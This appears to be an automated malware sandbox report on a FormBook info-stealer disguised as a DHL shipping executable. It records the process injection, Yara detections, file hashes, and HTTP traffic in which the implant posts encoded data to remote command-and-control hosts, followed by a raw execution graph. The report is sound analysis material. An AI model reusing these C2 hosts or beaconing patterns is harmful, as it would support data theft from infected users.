                                                                                          Data Raw: 55 54 35 74 54 64 4b 58 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a [TRUNCATED]
                                                                                          Dec 19, 2024 07:53:24.054831982 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:23 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          20 | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:53:25.294100046 CET | 530 | OUT | GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.elettrosistemista.zip
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:53:26.602058887 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 06:53:26 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 203
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49997 | 217.196.55.202 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:53:48.739106894 CET | 792 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.empowermedeco.com
                                                                                          Origin: http://www.empowermedeco.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Ascii: UT5tTdKX=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
Dec 19, 2024 07:53:49.937742949 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:49 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49998 | 217.196.55.202 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:53:51.385862112 CET | 812 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.empowermedeco.com
                                                                                          Origin: http://www.empowermedeco.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 229
                                                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                          Data Ascii: UT5tTdKX=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
Dec 19, 2024 07:53:52.582767010 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:52 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49999 | 217.196.55.202 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:53:54.038973093 CET | 1829 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.empowermedeco.com
                                                                                          Origin: http://www.empowermedeco.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 1245
                                                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:53:55.243753910 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:55 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 50000 | 217.196.55.202 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:53:56.698815107 CET | 526 | OUT | GET /fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.empowermedeco.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:53:57.895500898 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          content-type: text/html
                                                                                          content-length: 795
                                                                                          date: Thu, 19 Dec 2024 06:53:57 GMT
                                                                                          server: LiteSpeed
                                                                                          location: https://www.empowermedeco.com/fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL
                                                                                          platform: hostinger
                                                                                          panel: hpanel
                                                                                          content-security-policy: upgrade-insecure-requests
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body><
Dec 19, 2024 07:53:57.895536900 CET | 7 | IN | Data Raw: 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: /html>


                                                                                          Target ID:0
                                                                                          Start time:01:50:01
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\DHL 0737-12182024.exe"
                                                                                          Imagebase:0x820000
                                                                                          File size:1'254'400 bytes
                                                                                          MD5 hash:EC3BA2F9B2D0B8236AC14326F17C2512
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:01:50:03
Start date:19/12/2024
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\DHL 0737-12182024.exe"
Imagebase:0x5c0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:3
Start time:01:50:11
Start date:19/12/2024
Path:C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe"
Imagebase:0xdc0000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:false

Target ID:4
Start time:01:50:12
Start date:19/12/2024
Path:C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:0x1d0000
File size:22'016 bytes
MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:moderate
Has exited:false

Target ID:6
Start time:01:50:25
Start date:19/12/2024
Path:C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe"
Imagebase:0xdc0000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:false

Target ID:7
Start time:01:50:37
Start date:19/12/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff79f9e0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Execution Graph

Execution Coverage:3%
Dynamic/Decrypted Code Coverage:1%
Signature Coverage:3.1%
Total number of Nodes:1827
Total number of Limit Nodes:46
97406->97411 97409 82a587 22 API calls 97407->97409 97410 864a91 97408->97410 97409->97411 97412 83fe0b 22 API calls 97410->97412 97411->97348 97413 864ac5 __fread_nolock 97412->97413 97414->97349 97415 873a41 97419 8910c0 97415->97419 97417 873a4c 97418 8910c0 53 API calls 97417->97418 97418->97417 97424 8910fa 97419->97424 97425 8910cd 97419->97425 97420 8910fc 97454 83fa11 53 API calls 97420->97454 97421 891101 97430 827510 97421->97430 97424->97417 97425->97420 97425->97421 97425->97424 97428 8910f4 97425->97428 97427 826350 22 API calls 97427->97424 97453 82b270 39 API calls 97428->97453 97431 827525 97430->97431 97448 827522 97430->97448 97432 82755b 97431->97432 97433 82752d 97431->97433 97434 8650f6 97432->97434 97437 82756d 97432->97437 97445 86500f 97432->97445 97455 8451c6 26 API calls 97433->97455 97458 845183 26 API calls 97434->97458 97456 83fb21 51 API calls 97437->97456 97438 82753d 97441 83fddb 22 API calls 97438->97441 97439 86510e 97439->97439 97443 827547 97441->97443 97446 829cb3 22 API calls 97443->97446 97444 865088 97457 83fb21 51 API calls 97444->97457 97445->97444 97447 83fe0b 22 API calls 97445->97447 97446->97448 97449 865058 97447->97449 97448->97427 97450 83fddb 22 API calls 97449->97450 97451 86507f 97450->97451 97452 829cb3 22 API calls 97451->97452 97452->97444 97453->97424 97454->97421 97455->97438 97456->97438 97457->97434 97458->97439 97459 821044 97464 8210f3 97459->97464 97461 82104a 97500 8400a3 29 API calls __onexit 97461->97500 97463 821054 97501 821398 97464->97501 97468 82116a 97469 82a961 22 API calls 97468->97469 97470 821174 97469->97470 97471 82a961 22 API calls 97470->97471 97472 82117e 97471->97472 97473 82a961 22 API calls 97472->97473 97474 821188 97473->97474 97475 82a961 22 API calls 97474->97475 97476 8211c6 97475->97476 97477 82a961 22 API calls 97476->97477 97478 821292 97477->97478 97511 82171c 97478->97511 97482 8212c4 97483 82a961 22 API calls 97482->97483 97484 8212ce 97483->97484 97532 831940 97484->97532 
97486 8212f9 97542 821aab 97486->97542 97488 821315 97489 821325 GetStdHandle 97488->97489 97490 862485 97489->97490 97491 82137a 97489->97491 97490->97491 97492 86248e 97490->97492 97494 821387 OleInitialize 97491->97494 97493 83fddb 22 API calls 97492->97493 97495 862495 97493->97495 97494->97461 97549 89011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97495->97549 97497 86249e 97550 890944 CreateThread 97497->97550 97499 8624aa CloseHandle 97499->97491 97500->97463 97551 8213f1 97501->97551 97504 8213f1 22 API calls 97505 8213d0 97504->97505 97506 82a961 22 API calls 97505->97506 97507 8213dc 97506->97507 97508 826b57 22 API calls 97507->97508 97509 821129 97508->97509 97510 821bc3 6 API calls 97509->97510 97510->97468 97512 82a961 22 API calls 97511->97512 97513 82172c 97512->97513 97514 82a961 22 API calls 97513->97514 97515 821734 97514->97515 97516 82a961 22 API calls 97515->97516 97517 82174f 97516->97517 97518 83fddb 22 API calls 97517->97518 97519 82129c 97518->97519 97520 821b4a 97519->97520 97521 821b58 97520->97521 97522 82a961 22 API calls 97521->97522 97523 821b63 97522->97523 97524 82a961 22 API calls 97523->97524 97525 821b6e 97524->97525 97526 82a961 22 API calls 97525->97526 97527 821b79 97526->97527 97528 82a961 22 API calls 97527->97528 97529 821b84 97528->97529 97530 83fddb 22 API calls 97529->97530 97531 821b96 RegisterWindowMessageW 97530->97531 97531->97482 97533 831981 97532->97533 97534 83195d 97532->97534 97558 840242 5 API calls __Init_thread_wait 97533->97558 97541 83196e 97534->97541 97560 840242 5 API calls __Init_thread_wait 97534->97560 97536 83198b 97536->97534 97559 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97536->97559 97539 838727 97539->97541 97561 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97539->97561 97541->97486 97543 821abb 97542->97543 97544 86272d 97542->97544 97546 83fddb 22 API calls 97543->97546 
97562 893209 23 API calls 97544->97562 97547 821ac3 97546->97547 97547->97488 97548 862738 97549->97497 97550->97499 97563 89092a 28 API calls 97550->97563 97552 82a961 22 API calls 97551->97552 97553 8213fc 97552->97553 97554 82a961 22 API calls 97553->97554 97555 821404 97554->97555 97556 82a961 22 API calls 97555->97556 97557 8213c6 97556->97557 97557->97504 97558->97536 97559->97534 97560->97539 97561->97541 97562->97548 97564 872a00 97579 82d7b0 ISource 97564->97579 97565 82db11 PeekMessageW 97565->97579 97566 82d807 GetInputState 97566->97565 97566->97579 97567 871cbe TranslateAcceleratorW 97567->97579 97569 82db8f PeekMessageW 97569->97579 97570 82da04 timeGetTime 97570->97579 97571 82db73 TranslateMessage DispatchMessageW 97571->97569 97572 82dbaf Sleep 97593 82dbc0 97572->97593 97573 872b74 Sleep 97573->97593 97574 871dda timeGetTime 97743 83e300 23 API calls 97574->97743 97575 83e551 timeGetTime 97575->97593 97578 872c0b GetExitCodeProcess 97583 872c37 CloseHandle 97578->97583 97584 872c21 WaitForSingleObject 97578->97584 97579->97565 97579->97566 97579->97567 97579->97569 97579->97570 97579->97571 97579->97572 97579->97573 97579->97574 97580 82d9d5 97579->97580 97596 82dfd0 97579->97596 97624 831310 97579->97624 97679 83edf6 97579->97679 97684 82dd50 235 API calls 97579->97684 97685 82bf40 97579->97685 97744 893a2a 23 API calls 97579->97744 97745 82ec40 97579->97745 97769 89359c 82 API calls __wsopen_s 97579->97769 97581 8b29bf GetForegroundWindow 97581->97593 97583->97593 97584->97579 97584->97583 97585 872a31 97585->97580 97586 872ca9 Sleep 97586->97579 97593->97575 97593->97578 97593->97579 97593->97580 97593->97581 97593->97585 97593->97586 97770 8a5658 23 API calls 97593->97770 97771 88e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97593->97771 97772 88d4dc 47 API calls 97593->97772 97598 82e010 97596->97598 97597 872f7a 97599 82ec40 235 API calls 97597->97599 97598->97597 97601 82e075 97598->97601 97600 
872f8c 97599->97600 97608 82e0dc ISource 97600->97608 97775 89359c 82 API calls __wsopen_s 97600->97775 97601->97608 97776 840242 5 API calls __Init_thread_wait 97601->97776 97605 872fca 97607 82a961 22 API calls 97605->97607 97605->97608 97606 82a961 22 API calls 97606->97608 97609 872fe4 97607->97609 97608->97606 97616 82ec40 235 API calls 97608->97616 97618 82a8c7 22 API calls 97608->97618 97619 82e3e1 97608->97619 97620 8304f0 22 API calls 97608->97620 97622 89359c 82 API calls 97608->97622 97773 82a81b 41 API calls 97608->97773 97774 83a308 235 API calls 97608->97774 97779 840242 5 API calls __Init_thread_wait 97608->97779 97780 8400a3 29 API calls __onexit 97608->97780 97781 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97608->97781 97782 8a47d4 235 API calls 97608->97782 97783 8a68c1 235 API calls 97608->97783 97777 8400a3 29 API calls __onexit 97609->97777 97613 872fee 97778 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97613->97778 97616->97608 97618->97608 97619->97579 97620->97608 97622->97608 97625 8317b0 97624->97625 97626 831376 97624->97626 97887 840242 5 API calls __Init_thread_wait 97625->97887 97628 876331 97626->97628 97630 831940 9 API calls 97626->97630 97901 8a709c 235 API calls 97628->97901 97629 8317ba 97632 8317fb 97629->97632 97635 829cb3 22 API calls 97629->97635 97633 8313a0 97630->97633 97638 876346 97632->97638 97640 83182c 97632->97640 97636 831940 9 API calls 97633->97636 97634 87633d 97634->97579 97644 8317d4 97635->97644 97637 8313b6 97636->97637 97637->97632 97639 8313ec 97637->97639 97902 89359c 82 API calls __wsopen_s 97638->97902 97639->97638 97663 831408 __fread_nolock 97639->97663 97889 82aceb 97640->97889 97643 831839 97899 83d217 235 API calls 97643->97899 97888 8401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97644->97888 97647 87636e 97903 89359c 82 API calls __wsopen_s 97647->97903 97648 83152f 97650 8763d1 97648->97650 97651 83153c 97648->97651 97905 
8a5745 54 API calls _wcslen 97650->97905 97653 831940 9 API calls 97651->97653 97655 831549 97653->97655 97654 83fddb 22 API calls 97654->97663 97658 831940 9 API calls 97655->97658 97670 8315c7 ISource 97655->97670 97656 831872 97656->97628 97900 83faeb 23 API calls 97656->97900 97657 83fe0b 22 API calls 97657->97663 97666 831563 97658->97666 97659 83171d 97659->97579 97662 82ec40 235 API calls 97662->97663 97663->97643 97663->97647 97663->97648 97663->97654 97663->97657 97663->97662 97664 8763b2 97663->97664 97663->97670 97904 89359c 82 API calls __wsopen_s 97664->97904 97666->97670 97671 82a8c7 22 API calls 97666->97671 97667 831940 9 API calls 97667->97670 97669 83167b ISource 97669->97659 97886 83ce17 22 API calls ISource 97669->97886 97670->97656 97670->97667 97670->97669 97677 824f39 68 API calls 97670->97677 97784 88d4ce 97670->97784 97787 89f0ec 97670->97787 97796 8a959f 97670->97796 97799 896ef1 97670->97799 97879 891e96 97670->97879 97883 8a958b 97670->97883 97906 89359c 82 API calls __wsopen_s 97670->97906 97671->97670 97677->97670 97680 83ee09 97679->97680 97681 83ee12 97679->97681 97680->97579 97681->97680 97682 83ee36 IsDialogMessageW 97681->97682 97683 87efaf GetClassLongW 97681->97683 97682->97680 97682->97681 97683->97681 97683->97682 97684->97579 98299 82adf0 97685->98299 97687 82bf9d 97688 8704b6 97687->97688 97689 82bfa9 97687->97689 98327 89359c 82 API calls __wsopen_s 97688->98327 97691 8704c6 97689->97691 97692 82c01e 97689->97692 98328 89359c 